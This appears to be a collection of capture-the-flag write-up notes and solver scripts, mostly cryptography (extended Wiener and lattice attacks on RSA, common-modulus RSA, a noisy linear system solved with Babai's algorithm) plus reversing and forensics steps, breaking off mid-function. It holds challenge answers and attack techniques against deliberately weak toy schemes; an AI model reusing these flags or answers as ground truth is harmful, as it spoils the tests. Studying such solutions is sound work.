// Combine the first four character codes of s into a single 32-bit value,
// least-significant byte first; missing characters count as 0.
function Str4ToLong(s) {
  const word = [0, 1, 2, 3].reduce(
    (acc, pos) => acc | (s.charCodeAt(pos) << (pos * 8)),
    0
  );
  return isNaN(word) ? 0 : word;
}
// Split a 32-bit value into its four bytes and return them as a string,
// least-significant byte first.
function LongToStr4(v) {
  const b0 = v & 0xFF;
  const b1 = (v >> 8) & 0xFF;
  const b2 = (v >> 16) & 0xFF;
  const b3 = (v >> 24) & 0xFF;
  return String.fromCharCode(b0, b1, b2, b3);
}
// Escape characters that tend to break when ciphertext is stored as text:
// each match becomes "!" + its character code + "!".
function escCtrlCh(str) {
  const risky = /[\0\t\n\v\f\r\xa0'"!]/g;
  return str.replace(risky, (ch) => ['!', ch.charCodeAt(0), '!'].join(''));
}
// Undo escCtrlCh(): every "!NNN!" token (one to three digits) is replaced by
// the character with code NNN.
function unescCtrlCh(str) {
  return str.replace(/!\d\d?\d?!/g, function (token) {
    const code = parseInt(token.slice(1, -1), 10);
    return String.fromCharCode(code);
  });
}
// module.exports = (text, password) => text.decrypt(password);
let text = "flag{demo}"
let entext = text.encrypt("123321")
let detext = entext.decrypt("123321")
console.log(detext);

simple

#**Task
# task.py
from Crypto.Util.number import *
import gmpy2
import random
def get_extend():
    """Return a public exponent whose private exponent is a random prime d.

    d is drawn from [2**680, 2**730] with the ``random`` module and retried
    until ``isPrime(d)`` holds; the result is the inverse of d modulo the
    module-level ``lcm``. With the 1024-bit p and q generated below, d is far
    shorter than the modulus, which is the weakness the accompanying
    solution's lattice step relies on.
    """
    while True:
        candidate = random.randint(2**680, 2**730)
        if not isPrime(candidate):
            continue
        return gmpy2.invert(candidate, lcm)
#731
flag = b"flag{xxxxxxxxxxx}"
m = bytes_to_long(flag)
e = 65537
p = getPrime(1024)
q = getPrime(1024)
lcm = gmpy2.lcm(p-1,q-1)
n = p*q
c = pow(m,e,n)
e1 = get_extend()
e2 = get_extend()
print("e1 =",e1)
print("e2 =",e2)
print("c =",c)
print("n =",n)
#e1 = 1038188773022222237625162518466985515806685046439847462572843423800303080199415368325579099819361640945202226526678764311585592296933622966635366454130900252466567292666094830865094694540899938932650663694321540899409821558619513870070621174837528024755540950294728078653453000484865860920060355130142874882872471337494879275434166435493265146752291857135290428750750609423353579700984426964475724965353873095813181244686536072523222027403912142730610262067287620007571352094447066062529895627497159337248165671672168914514241613626520037706745398642583257608070477729851466078618962204332539106519787878047712382699
#e2 = 2837849440271663829778449470456059993823700375016504578318494102782617180188657051885856137280051100635878402423110369686929227684421486015532180997159960436120141492683886715611434986294622600612428406093623932339780091710632795226634412256078611259843109876301975664056868908063144172636320692414857287719870275516722663234436495523740203192523105607062687910252368627072074836944313105637959564954309098651598325997792496430340003856687190484681832529188281328826421428597879086043647647886763379182416419551074016810300511817626177321217978912504879476086100668005286481779806010131350674761039391612993646202901
#c = 5973798238952580291825915383143493132916118834759984908567429997405141389115327100612059752092101975323145558282778289524466024564450720131251849100687215493221989801105144437981685382023973692198113306045957788268110316519461230170693204752380105917975206409994893101671098451678847638671373239757408532363808224681853024689663345258120864348816343897379881239786554998688501997609152329902187048422237325117741778968505252184157273467466011959504548459297647302026380076579903441434135973514451254950835559924204821846949520738057940287763572642367638668413987340659205489659594044022422368411980101640782079189025
#n = 26901814699902439156457451193693740730489294959491270367027927283506475930489639407729426818974347303153364758700002407059993182986763909124690390655890031474097185414651218374672254140022392199647526025638012909369532528422355530044873378287920255523382224453173638818751280227521077881224963029942704252587893395262633450759457753054490886171089835324182422639138198164026845488515879253564971977801724349440235209377091735281830263780308625603392942624306475075157394231585266792247387837984357822842056801420064918953837917678662504712605611080802179768683537742095990507008809197788025847612652983474906829809607
#***Solution
# exp.sage
from sage.all import *
from Crypto.Util.number import *
from Crypto.Cipher import DES
import gmpy2
from Crypto.Util.number import *
from gmpy2 import invert
# USE extending wiener attack
e1 = 1038188773022222237625162518466985515806685046439847462572843423800303080199415368325579099819361640945202226526678764311585592296933622966635366454130900252466567292666094830865094694540899938932650663694321540899409821558619513870070621174837528024755540950294728078653453000484865860920060355130142874882872471337494879275434166435493265146752291857135290428750750609423353579700984426964475724965353873095813181244686536072523222027403912142730610262067287620007571352094447066062529895627497159337248165671672168914514241613626520037706745398642583257608070477729851466078618962204332539106519787878047712382699
e2 = 2837849440271663829778449470456059993823700375016504578318494102782617180188657051885856137280051100635878402423110369686929227684421486015532180997159960436120141492683886715611434986294622600612428406093623932339780091710632795226634412256078611259843109876301975664056868908063144172636320692414857287719870275516722663234436495523740203192523105607062687910252368627072074836944313105637959564954309098651598325997792496430340003856687190484681832529188281328826421428597879086043647647886763379182416419551074016810300511817626177321217978912504879476086100668005286481779806010131350674761039391612993646202901
c = 5973798238952580291825915383143493132916118834759984908567429997405141389115327100612059752092101975323145558282778289524466024564450720131251849100687215493221989801105144437981685382023973692198113306045957788268110316519461230170693204752380105917975206409994893101671098451678847638671373239757408532363808224681853024689663345258120864348816343897379881239786554998688501997609152329902187048422237325117741778968505252184157273467466011959504548459297647302026380076579903441434135973514451254950835559924204821846949520738057940287763572642367638668413987340659205489659594044022422368411980101640782079189025
N = 26901814699902439156457451193693740730489294959491270367027927283506475930489639407729426818974347303153364758700002407059993182986763909124690390655890031474097185414651218374672254140022392199647526025638012909369532528422355530044873378287920255523382224453173638818751280227521077881224963029942704252587893395262633450759457753054490886171089835324182422639138198164026845488515879253564971977801724349440235209377091735281830263780308625603392942624306475075157394231585266792247387837984357822842056801420064918953837917678662504712605611080802179768683537742095990507008809197788025847612652983474906829809607
# Size of the private exponents relative to the modulus: the task draws d from
# at most 2**730 for a 2048-bit N, so d is roughly N**a.
a = 0.356  # 731./2049
# Column scaling factors for the lattice basis built below.
# NOTE(review): N ** 0.5 and N ** (a + 1) are not integers; whether
# diagonal_matrix(ZZ, ...) accepts them depends on Sage's coercion -- confirm.
M1 = N ** 0.5
M2 = N ** (a + 1)
D = diagonal_matrix(ZZ, [N, M1, M2, 1])
# Basis combining both public exponents e1, e2 and N, scaled column-wise by D.
M = matrix(ZZ, [[1, -N, 0, N ** 2], [0, e1, -e1, -e1 * N], [0, 0, e2, -e2 * N], [0, 0, 0, e1 * e2]]) * D
L = M.LLL()
# Take the first vector of the reduced basis and express it in terms of the rows of M.
t = vector(ZZ, L[0])
x = t * M ** (-1)
# The ratio of the first two coefficients, times e1, is used as the totient.
# NOTE(review): the task inverts d modulo lcm(p-1, q-1), not phi -- presumably
# the recovered value is still usable for the inversion below; confirm.
phi = int(x[1] / x[0] * e1)
# The flag was encrypted with e = 65537 (0x10001), so that is the exponent inverted here.
d = invert(0x10001, phi)
m = pow(c, d, N)
print(long_to_bytes(m))
'''
pip install pycryptodome
pip install gmpy2
sage --pip install gmpy2
sage exp.sage
'''
# b'flag{d30488dc-ed10-4f09-aebb-5c049436d250}'

#***Task.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import random
from Crypto.Util.number import bytes_to_long
# from secret import FLAG
# Placeholder flag; the real one came from the commented-out secret module.
FLAG = b"flag{123}"
assert FLAG.startswith(b'flag{') and FLAG.endswith(b'}')
q = 210767327475911131359308665806489575328083

# Bits of the flag body (without "flag{" and "}"), most significant first.
payload = bytes_to_long(FLAG[5:-1])
flag_bin = format(payload, 'b')
l = len(flag_bin)
print(l)
print(bin(payload))

# Between l and 2*l samples are produced.
n = random.randint(l, 2 * l)
print(n)

# Each sample is l random residues r plus the product, modulo q, of those r[i]
# whose flag bit is 1. The product keeps the quadratic-residue character of
# its factors, so every sample leaks one linear relation over GF(2) between
# the flag bits -- which is what the solver that follows uses.
cipher = []
for _ in range(n):
    r = [random.randint(2, q - 2) for _ in range(l)]
    s = 1
    for bit, base in zip(flag_bin, r):
        s = (s * base ** int(bit)) % q
    cipher.append([r, s])

with open('new_output.txt', 'w') as f:
    f.write(str(cipher))
#exp.py
from Crypto.Util.number import *
from sage.all import *
def add(a,p):
    """Return 1 if ``a ** ((p - 1) // 2) % p`` equals 1, otherwise 0.

    For an odd prime p this is Euler's criterion: 1 means a is a non-zero
    quadratic residue modulo p.
    """
    return int(pow(a, (p - 1) // 2, p) == 1)
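import ast

q = 210767327475911131359308665806489575328083

# The challenge output is a printed Python list of [r, s] pairs. It is parsed
# with ast.literal_eval instead of eval(): eval() would execute any expression
# placed in the file, while literal_eval only accepts literals. The file is
# opened in text mode because literal_eval does not take bytes, and the
# context manager closes it (the original handle was never closed).
# NOTE(review): the task script above writes 'new_output.txt' while this reads
# 'output.txt' -- presumably the provided challenge file; confirm the name.
with open('output.txt', 'r') as f:
    out = ast.literal_eval(f.read())

# One row per sample: entry j is the residue indicator of r[j], and the
# right-hand side is the indicator of the product s, plus 1 (arithmetic in GF(2)).
A = Matrix(GF(2), len(out))
v = vector(GF(2), len(out))
for i in range(len(out)):
    t1, t2 = out[i]
    for j in range(len(t1)):
        A[i, j] = add(t1[j], q)
    v[i] = add(t2, q) + 1

# Solve the linear system over GF(2) and read the solution as a bit string.
m = A.solve_right(v)
m = ''.join(map(str, m))
print(long_to_bytes(int(m, 2)))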

NONO

import base64
import re
# 填出来的数织答案
v27 ="0000000000000000000000000000000010000000000000000001110000000000000000111110000000000000111111110000000000011111111100000000001111111111100000000000111111100000000000000000000000000111111111111110000011100000000011110000111000000000111111100111111111111111000000000000000000000000000000111111100000000000001111111000000000000111111110000000000001111111000000000000000000000000000000000000000000000000"
# 得到flag:flag{UDnkDgD2HEPlFEXlF8uyHPBHFEEnD8NTDPr3j85THDP+jKD=}
##
# 按照0或1的连续⻓度进⾏压缩
# Run-length encode the solved grid: one byte per run of identical digits.
tmpl = re.findall(r'0+|1+', v27)
v24 = bytes(len(run) for run in tmpl)

# Decode table recovered from the binary: position p holds the 6-bit value of
# the character chr(p + 43), or 0xFF when that character is not in the alphabet.
unk_403040 = [
    0x0C, 0xFF, 0xFF, 0xFF, 0x22, 0x2C, 0x25, 0x05, 0x1E, 0x1F, 0x34, 0x1D,
    0x39, 0x30, 0x15, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2B, 0x14,
    0x2D, 0x00, 0x10, 0x02, 0x11, 0x03, 0x37, 0x29, 0x33, 0x3B, 0x2E, 0x24,
    0x2F, 0x20, 0x0A, 0x3D, 0x3F, 0x07, 0x08, 0x17, 0x0D, 0x28, 0x27, 0x26,
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x35, 0x2A, 0x3A, 0x13, 0x18, 0x3E,
    0x31, 0x38, 0x21, 0x01, 0x12, 0x0B, 0x32, 0x04, 0x06, 0x19, 0x09, 0x3C,
    0x1B, 0x0E, 0x1C, 0x36, 0x0F, 0x16, 0x1A, 0x23,
]

# Invert it into the 64-character encoding alphabet. Every non-0xFF value
# occurs once in the table, so its position identifies the character.
mytable = [0] * 64
for position, value in enumerate(unk_403040):
    if value == 0xFF:
        continue
    mytable[value] = chr(position + 43)
mytable = ''.join(mytable)

# Encode with standard base64, then map each character to the custom alphabet.
b64table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
s = base64.b64encode(v24)
swap_alphabet = str.maketrans(b64table, mytable)
flag = "flag{" + s.decode().translate(swap_alphabet) + "}"
print(flag)

kaokaoni

a = [[8, 2, 22, 97, 38, 15, 0, 40, 0, 75, 4, 5, 7, 78, 52, 12, 50, 77, 91, 8],
[49, 49, 99, 40, 17, 81, 18, 57, 60, 87, 17, 40, 98, 43, 69, 48, 4, 56, 62, 0],
[81, 49, 31, 73, 55, 79, 14, 29, 93, 71, 40, 67, 53, 88, 30, 3, 49, 13, 36, 65],
[52, 70, 95, 23, 4, 60, 11, 42, 69, 24, 68, 56, 1, 32, 56, 71, 37, 2, 36, 91],
[22, 31, 16, 71, 51, 67, 63, 89, 41, 92, 36, 54, 22, 40, 40, 28, 66, 33, 13, 80],
[24, 47, 32, 60, 99, 3, 45, 2, 44, 75, 33, 53, 78, 36, 84, 20, 35, 17, 12, 50],
[32, 98, 81, 28, 64, 23, 67, 10, 26, 38, 40, 67, 59, 54, 70, 66, 18, 38, 64, 70],
[67, 26, 20, 68, 2, 62, 12, 20, 95, 63, 94, 39, 63, 8, 40, 91, 66, 49, 94, 21],
[24, 55, 58, 5, 66, 73, 99, 26, 97, 17, 78, 78, 96, 83, 14, 88, 34, 89, 63, 72],
[21, 36, 23, 9, 75, 0, 76, 44, 20, 45, 35, 14, 0, 61, 33, 97, 34, 31, 33, 95],
[78, 17, 53, 28, 22, 75, 31, 67, 15, 94, 3, 80, 4, 62, 16, 14, 9, 53, 56, 92],
[16, 39, 5, 42, 96, 35, 31, 47, 55, 58, 88, 24, 0, 17, 54, 24, 36, 29, 85, 57],
[86, 56, 0, 48, 35, 71, 89, 7, 5, 44, 44, 37, 44, 60, 21, 58, 51, 54, 17, 58],
[19, 8, 81, 68, 5, 94, 47, 69, 28, 73, 92, 13, 86, 52, 17, 77, 4, 89, 55, 40],
[4, 52, 8, 83, 97, 35, 99, 16, 7, 97, 57, 32, 16, 26, 26, 79, 33, 27, 98, 66],
[88, 36, 68, 87, 57, 62, 20, 72, 3, 46, 33, 67, 46, 55, 12, 32, 63, 93, 53, 69],
[4, 42, 16, 73, 38, 25, 39, 11, 24, 94, 72, 18, 8, 46, 29, 32, 40, 62, 76, 36],
[20, 69, 36, 41, 72, 30, 23, 88, 34, 62, 99, 69, 82, 67, 59, 85, 74, 4, 36, 16],
[20, 73, 35, 29, 78, 31, 90, 1, 74, 31, 49, 71, 48, 86, 81, 16, 23, 57, 5, 54],
[1, 70, 54, 71, 83, 51, 54, 69, 16, 92, 33, 48, 61, 43, 52, 1, 89, 19, 67, 48]]
# Products of four adjacent cells of the 20x20 grid `a`, grouped by direction:
# aa[0] along rows, aa[1] along columns, aa[2] and aa[3] along the two diagonals.
aa = [[] for _ in range(4)]

for line in range(20):
    for start in range(17):
        along_row = a[line][start] * a[line][start + 1] * a[line][start + 2] * a[line][start + 3]
        along_col = a[start][line] * a[start + 1][line] * a[start + 2][line] * a[start + 3][line]
        aa[0].append(along_row)
        aa[1].append(along_col)

for top in range(17):
    for left in range(17):
        falling = a[top][left] * a[top + 1][left + 1] * a[top + 2][left + 2] * a[top + 3][left + 3]
        rising = a[top + 3][left] * a[top + 2][left + 1] * a[top + 1][left + 2] * a[top][left + 3]
        aa[2].append(falling)
        aa[3].append(rising)

# Largest product found in each direction.
for products in aa:
    print(max(products))

ezflow

#open the capture in Wireshark
#export the zip file from the pcap
#find the zip password in the pcap data: filter the time-based (timeout) SQL injection requests
#unzip the file with that password to get the flag

task.py

from Crypto.Util.number import *
from flag import *
m = bytes_to_long(flag)
n = 2748281443944427868843369402621263042158244258427433547653329234844505048333691189629107146775166551897070384880309396022510445087966911639388490862151
e1 = 65537
e2 = 992923
c1 = pow(m,e1,n)
c2 = pow(m,e2,n)
#c1 = 285685918239736826397269350382490971822513853503791279402545608976504614743806744945079572548121135341824742716166350238418142063969240075997981863636
#c2 = 129273488481770576836913112982915335157542027932363877138157510043383503149178933085861517442700435060934412452576721945085276483980455830616742529117

exp.py

#give e1,e2,c1,c2,n
#find m
import gmpy2
from Crypto.Util.number import long_to_bytes,bytes_to_long
n = 2748281443944427868843369402621263042158244258427433547653329234844505048333691189629107146775166551897070384880309396022510445087966911639388490862151
e1 = 65537
e2 = 992923
c1 = 285685918239736826397269350382490971822513853503791279402545608976504614743806744945079572548121135341824742716166350238418142063969240075997981863636
c2 = 129273488481770576836913112982915335157542027932363877138157510043383503149178933085861517442700435060934412452576721945085276483980455830616742529117
# The same message was encrypted, without padding, under two exponents that
# share one modulus. gcdext returns (g, r, s) with r*e1 + s*e2 == g, so
# c1**r * c2**s equals m**g modulo n; the result is m when g is 1. Padding
# schemes such as OAEP and never sharing a modulus between keys prevent this.
_, r, s = gmpy2.gcdext(e1, e2)
part_from_c1 = gmpy2.powmod(c1, r, n)
part_from_c2 = gmpy2.powmod(c2, s, n)
m = part_from_c1 * part_from_c2 % n
print(long_to_bytes(m))

checkin

#GY3DMYZWGE3DON3CGQZTGNZUGY2WMNJXGZTDOMRTGE3DINLGGQ4TGNJVMY2TGMZQGVTDINRXGU3GKNTFG44TKZRUHA3GMNZQGMZTKZRVHEZTANZVGVTDIYZWHE3GENRVGVTDGMJXGQ3WI
Open CyberChef and let it auto-decode.

Capture Radiate Chart

get_rar.py

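# Collect the byte found 5 positions before every IDAT marker after the first
# one and write those bytes, as hex text, to out.rar.
with open('alien.png', 'rb') as png:
    data = png.read()

flag = ''
pos = data.index(b'IDAT')
data = data[pos+5:]
while True:
    try:
        pos = data.index(b'IDAT')
    except ValueError:
        # No further IDAT marker. The original used a bare `except:` without
        # leaving the loop, so it rewrote the output file forever and also
        # swallowed unrelated errors (including Ctrl-C).
        break
    flag += format(data[pos-5], '02x')
    data = data[pos+5:]

# NOTE(review): the output is the hex string, not the decoded bytes; if a real
# RAR archive is expected here, bytes.fromhex(flag) written in 'wb' mode would
# be needed -- confirm against the next step of the write-up.
with open('out.rar', 'w') as f1:
    f1.write(flag)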

ILOVEYOU

image-20230604014025638

# open http://www.cmd5.com/ decode find flag

bob’s enc

task.py

from secret import *
import random
prime =  2141
print len(flag)
flag = map(ord,flag)
flag1 = flag[:21]
flag2 = flag[21:]
row = 64
def add(msg1,msg2):
    """Add two sequences element by element, reducing each sum modulo ``prime``.

    The result is as long as the shorter input.
    """
    summed = []
    for left, right in zip(msg1, msg2):
        summed.append((left + right) % prime)
    return summed
def multi(msg1,msg2):
    """Multiply the matrix ``msg1`` (a list of rows) by the vector ``msg2`` modulo ``prime``.

    Returns one value per row: the dot product of that row with ``msg2``,
    reduced modulo ``prime``.
    """
    return [
        sum((x * y) % prime for x, y in zip(line, msg2)) % prime
        for line in msg1
    ]
def genkey(leng):
    """Build the key matrix: ``row`` rows of ``leng`` random integers in [0, 511].

    Values are drawn with ``random.randint`` row by row.
    """
    return [
        [random.randint(0, 511) for _ in range(leng)]
        for _ in range(row)
    ]
key = genkey(len(flag1))
print key
cipher1 = multi(key,flag1)
print cipher1
cipher2 = multi(key,flag2)
noise = [random.randint(0,6) for i in range(row)]
print add(noise,cipher2)

exp.py

from sage.all import *
from sage.modules.free_module_integer import IntegerLattice
from random import randint
import sys
from itertools import starmap
from operator import mul
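import ast

# Each line of 'out' is a printed Python list (the key, then the two cipher
# vectors). ast.literal_eval parses them without executing code; the original
# eval() would run whatever expression the file contained.
with open('out', 'r') as f:
    key = ast.literal_eval(f.readline())
    c1 = ast.literal_eval(f.readline())
    c2 = ast.literal_eval(f.readline())

prime = 2141

# First half of the flag: cipher1 = key * flag1 (mod prime) carries no noise,
# so 21 of the 64 equations are enough to invert the system directly.
K = matrix(Zmod(prime), key[:21])
C1 = vector(Zmod(prime), c1[:21])
m1 = K.inverse() * C1
flag = ''
for i in m1:
    flag += chr(i)
print(flag)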
# Babai's Nearest Plane algorithm
def Babai_closest_vector(M, G, target):
    """Approximate the lattice vector closest to ``target``.

    M holds the basis rows and G the matching Gram-Schmidt rows. For each
    basis row, from last to first, the rounded projection coefficient of the
    current residual onto G[i] is subtracted as a multiple of M[i]; the whole
    sweep is repeated five times. Returns ``target`` minus the final residual.
    """
    residual = target
    for _ in range(5):
        for idx in reversed(range(M.nrows())):
            direction = G[idx]
            coeff = ((residual * direction) / (direction * direction)).round()
            residual -= M[idx] * coeff
    return target - residual
# Second half of the flag: cipher2 = key * flag2 + noise (mod prime), where the
# task draws each noise entry from 0..6. With 64 samples, 21 unknowns and
# noise this small next to the modulus 2141, the noise-free vector is the
# lattice point nearest to the ciphertext.
m = 64
n = 21
q = prime
A_values = key
b_values = c2

# Row basis of the lattice: q times the identity on top, the transposed key below.
A = matrix(ZZ, m + n, m)
for x in range(m):
    A[x, x] = q
    for y in range(n):
        A[m + y, x] = A_values[x][y]

lattice = IntegerLattice(A, lll_reduce=True)
reduced = lattice.reduced_basis
gram = reduced.gram_schmidt()[0]
target = vector(ZZ, b_values)
res = Babai_closest_vector(reduced, gram, target)

# With the noise removed, solve key * flag2 = res modulo q.
R = IntegerModRing(q)
M = Matrix(R, A_values)
ingredients = M.solve_right(res)
for i in ingredients:
    flag += chr(i)
print(flag)
#get flag
sage exp.py

babyqmk

SEED = 0
KC_A = 4
KC_Z = 29
KC_1 = 30
KC_9 = 38
KC_0 = 39
def rand():
    """Advance the global linear congruential generator and return 15 bits.

    The multiplier 214013 and increment 2531011 are the ones used by the
    Microsoft C runtime's rand(). SEED is not truncated to 32 bits here; the
    returned value only depends on bits 16..30 of the new state.
    """
    global SEED
    SEED = SEED * 214013 + 2531011
    return (SEED // 65536) % 32768
keycodeToKey = {0:'KC_NO', 1:'KC_TRANSPARENT', 2:'KC_POST_FAIL', 3:'KC_UNDEFINED',
4:'KC_A', 5:'KC_B', 6:'KC_C', 7:'KC_D', 8:'KC_E', 9:'KC_F', 10:'KC_G', 11:'KC_H',
12:'KC_I', 13:'KC_J', 14:'KC_K', 15:'KC_L', 16:'KC_M', 17:'KC_N', 18:'KC_O', 19:'KC_P',
20:'KC_Q', 21:'KC_R', 22:'KC_S', 23:'KC_T', 24:'KC_U', 25:'KC_V', 26:'KC_W', 27:'KC_X',
28:'KC_Y', 29:'KC_Z', 30:'KC_1', 31:'KC_2', 32:'KC_3', 33:'KC_4', 34:'KC_5', 35:'KC_6',
36:'KC_7', 37:'KC_8', 38:'KC_9', 39:'KC_0', 40:'KC_ENTER', 41:'KC_ESCAPE',
42:'KC_BACKSPACE', 43:'KC_TAB', 44:'KC_SPACE', 45:'KC_MINUS', 46:'KC_EQUAL',
47:'KC_LEFT_BRACKET', 48:'KC_RIGHT_BRACKET', 49:'KC_BACKSLASH', 50:'KC_NONUS_HASH',
51:'KC_SEMICOLON', 52:'KC_QUOTE', 53:'KC_GRAVE', 54:'KC_COMMA', 55:'KC_DOT',
56:'KC_SLASH', 57:'KC_CAPS_LOCK', 58:'KC_F1', 59:'KC_F2', 60:'KC_F3', 61:'KC_F4',
62:'KC_F5', 63:'KC_F6', 64:'KC_F7', 65:'KC_F8', 66:'KC_F9', 67:'KC_F10', 68:'KC_F11',
69:'KC_F12', 70:'KC_PRINT_SCREEN', 71:'KC_SCROLL_LOCK', 72:'KC_PAUSE', 73:'KC_INSERT',
74:'KC_HOME', 75:'KC_PAGE_UP', 76:'KC_DELETE', 77:'KC_END', 78:'KC_PAGE_DOWN',
79:'KC_RIGHT', 80:'KC_LEFT', 81:'KC_DOWN', 82:'KC_UP', 83:'KC_NUM_LOCK',
84:'KC_KP_SLASH', 85:'KC_KP_ASTERISK', 86:'KC_KP_MINUS', 87:'KC_KP_PLUS',
88:'KC_KP_ENTER', 89:'KC_KP_1', 90:'KC_KP_2', 91:'KC_KP_3', 92:'KC_KP_4', 93:'KC_KP_5',
94:'KC_KP_6', 95:'KC_KP_7', 96:'KC_KP_8', 97:'KC_KP_9', 98:'KC_KP_0', 99:'KC_KP_DOT',
100:'KC_NONUS_BACKSLASH', 101:'KC_APPLICATION', 102:'KC_KB_POWER', 103:'KC_KP_EQUAL',
104:'KC_F13', 105:'KC_F14', 106:'KC_F15', 107:'KC_F16', 108:'KC_F17', 109:'KC_F18',
110:'KC_F19', 111:'KC_F20', 112:'KC_F21', 113:'KC_F22', 114:'KC_F23', 115:'KC_F24',
116:'KC_EXECUTE', 117:'KC_HELP', 118:'KC_MENU', 119:'KC_SELECT', 120:'KC_STOP',
121:'KC_AGAIN', 122:'KC_UNDO', 123:'KC_CUT', 124:'KC_COPY', 125:'KC_PASTE',
126:'KC_FIND', 127:'KC_KB_MUTE', 128:'KC_KB_VOLUME_UP', 129:'KC_KB_VOLUME_DOWN',
130:'KC_LOCKING_CAPS_LOCK', 131:'KC_LOCKING_NUM_LOCK', 132:'KC_LOCKING_SCROLL_LOCK',
133:'KC_KP_COMMA', 134:'KC_KP_EQUAL_AS400', 135:'KC_INTERNATIONAL_1',
136:'KC_INTERNATIONAL_2', 137:'KC_INTERNATIONAL_3', 138:'KC_INTERNATIONAL_4',
139:'KC_INTERNATIONAL_5', 140:'KC_INTERNATIONAL_6', 141:'KC_INTERNATIONAL_7',
142:'KC_INTERNATIONAL_8', 143:'KC_INTERNATIONAL_9', 144:'KC_LANGUAGE_1',
145:'KC_LANGUAGE_2', 146:'KC_LANGUAGE_3', 147:'KC_LANGUAGE_4', 148:'KC_LANGUAGE_5',
149:'KC_LANGUAGE_6', 150:'KC_LANGUAGE_7', 151:'KC_LANGUAGE_8', 152:'KC_LANGUAGE_9',
153:'KC_ALTERNATE_ERASE', 154:'KC_SYSTEM_REQUEST', 155:'KC_CANCEL', 156:'KC_CLEAR',
157:'KC_PRIOR', 158:'KC_RETURN', 159:'KC_SEPARATOR', 160:'KC_OUT', 161:'KC_OPER',
162:'KC_CLEAR_AGAIN', 163:'KC_CRSEL', 164:'KC_EXSEL', 224:'KC_LEFT_CTRL',
225:'KC_LEFT_SHIFT', 226:'KC_LEFT_ALT', 227:'KC_LEFT_GUI', 228:'KC_RIGHT_CTRL',
229:'KC_RIGHT_SHIFT', 230:'KC_RIGHT_ALT', 231:'KC_RIGHT_GUI'}
keymaps = [0x0029, 0x0000, 0x003A, 0x003B, 0x003C, 0x003D, 0x0000, 0x003E,
0x003F, 0x0040, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046,
0x0047, 0x0048, 0x0035, 0x001E, 0x001F, 0x0020, 0x0021, 0x0022,
0x0023, 0x0024, 0x0025, 0x0026, 0x0027, 0x002D, 0x002E, 0x002A,
0x0000, 0x0049, 0x004A, 0x004B, 0x002B, 0x0000, 0x0014, 0x001A,
0x0008, 0x0015, 0x0017, 0x001C, 0x0018, 0x000C, 0x0012, 0x0013,
0x002F, 0x0030, 0x0031, 0x004C, 0x004D, 0x004E, 0x0039, 0x0000,
0x0004, 0x0016, 0x0007, 0x0009, 0x000A, 0x000B, 0x000D, 0x000E,
0x000F, 0x0033, 0x0034, 0x0028, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x00E1, 0x001D, 0x001B, 0x0006, 0x0019, 0x0005, 0x0011,
0x0010, 0x0036, 0x0037, 0x0038, 0x0000, 0x00E5, 0x0000, 0x0000,
0x0052, 0x0000, 0x00E0, 0x00E3, 0x0000, 0x00E2, 0x0000, 0x0000,
0x002C, 0x0000, 0x0000, 0x0000, 0x00E6, 0x00E7, 0x0000, 0x0065,
0x00E4, 0x0050, 0x0051, 0x004F, 0x0029, 0x0000, 0x003A, 0x003B,
0x003C, 0x003D, 0x0000, 0x003E, 0x003F, 0x0040, 0x0041, 0x0042,
0x0043, 0x0044, 0x0045, 0x0046, 0x0047, 0x0048, 0x0035, 0x0012,
0x0013, 0x000D, 0x0020, 0x001B, 0x0016, 0x000E, 0x0005, 0x0011,
0x001A, 0x002D, 0x002E, 0x002A, 0x0000, 0x0049, 0x004A, 0x004B,
0x002B, 0x0000, 0x0015, 0x000A, 0x0027, 0x0022, 0x0009, 0x0018,
0x0024, 0x0023, 0x0017, 0x0006, 0x002F, 0x0030, 0x0031, 0x004C,
0x004D, 0x004E, 0x0039, 0x0000, 0x0007, 0x0004, 0x0010, 0x000C,
0x0019, 0x0008, 0x001C, 0x0014, 0x000F, 0x0033, 0x0034, 0x0028,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x00E1, 0x001F, 0x000B,
0x001E, 0x0025, 0x001D, 0x0026, 0x0021, 0x0036, 0x0037, 0x0038,
0x0000, 0x00E5, 0x0000, 0x0000, 0x0052, 0x0000, 0x00E0, 0x00E3,
0x0000, 0x00E2, 0x0000, 0x0000, 0x002C, 0x0000, 0x0000, 0x0000,
0x00E6, 0x00E7, 0x0000, 0x0065, 0x00E4, 0x0050, 0x0051, 0x004F,
0x0029, 0x0000, 0x003A, 0x003B, 0x003C, 0x003D, 0x0000, 0x003E,
0x003F, 0x0040, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046,
0x0047, 0x0048, 0x0035, 0x0001, 0x0001, 0x0001, 0x0001, 0x0001,
0x0001, 0x0001, 0x0001, 0x0001, 0x0001, 0x002D, 0x002E, 0x002A,
0x0000, 0x0049, 0x004A, 0x004B, 0x002B, 0x0000, 0x0025, 0x0004,
0x0023, 0x0015, 0x0008, 0x001D, 0x0019, 0x001F, 0x0006, 0x0027,
0x002F, 0x0030, 0x0031, 0x004C, 0x004D, 0x004E, 0x0039, 0x0000,
0x0010, 0x0007, 0x000F, 0x0009, 0x0021, 0x0022, 0x001E, 0x0026,
0x000B, 0x0033, 0x0034, 0x0028, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x00E1, 0x0018, 0x001C, 0x0024, 0x0014, 0x0017, 0x000C,
0x000A, 0x0036, 0x0037, 0x0038, 0x0000, 0x00E5, 0x0000, 0x0000,
0x0052, 0x0000, 0x00E0, 0x00E3, 0x0000, 0x00E2, 0x0000, 0x0000,
0x002C, 0x0000, 0x0000, 0x0000, 0x00E6, 0x00E7, 0x0000, 0x0065,
0x00E4, 0x0050, 0x0051, 0x004F]
LayerMap = [dict(), dict(), dict()]
def buildLayerMap(layer):
    """Fill LayerMap[layer] with "key on this layer" -> "key on layer 0".

    Each layer occupies 108 consecutive entries of ``keymaps``. A keycode of 1
    (KC_TRANSPARENT) is replaced by the entry at the same position one layer
    below before the lookup.
    """
    this_layer = layer * 108
    layer_below = (layer - 1) * 108
    mapping = LayerMap[layer]
    for offset in range(108):
        code = keymaps[this_layer + offset]
        if code == 1:  # KC_TRANSPARENT
            code = keymaps[layer_below + offset]
        mapping[keycodeToKey[code]] = keycodeToKey[keymaps[offset]]
def formatLayer():
    """Print the three keymap layers as 6 lines of 18 key names each.

